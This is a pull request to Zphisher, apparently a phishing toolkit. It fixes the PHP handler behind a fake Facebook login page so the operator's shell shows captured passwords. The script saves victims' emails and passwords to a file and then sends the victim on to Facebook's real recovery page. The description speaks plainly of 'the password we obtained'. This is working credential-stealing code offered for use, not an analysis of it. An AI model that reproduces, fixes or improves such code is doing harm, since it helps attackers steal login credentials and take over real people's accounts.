### PR TITLE
Graphical shell error for facebook login

### DIFF
--- a/.sites/facebook/login.php
+++ b/.sites/facebook/login.php
@@ -1,5 +1,5 @@
 <?php 
-file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);
+file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
 header('Location: https://facebook.com/recover/initiate/');
 exit();
 ?>


### PR DESCRIPTION
This error appears only with Facebook login. 
When we select the facebook login in Zphisher, in the shell we can't see the password we obtained. 
In particular the error is at line 2 of .sites/facebook/login.php
`file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);`
To see the password we need to change the line of code to:
`file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);`

![Error](https://user-images.githubusercontent.com/57435273/157292874-0c318554-ff8d-4ba1-a36b-78c081c7b584.png)
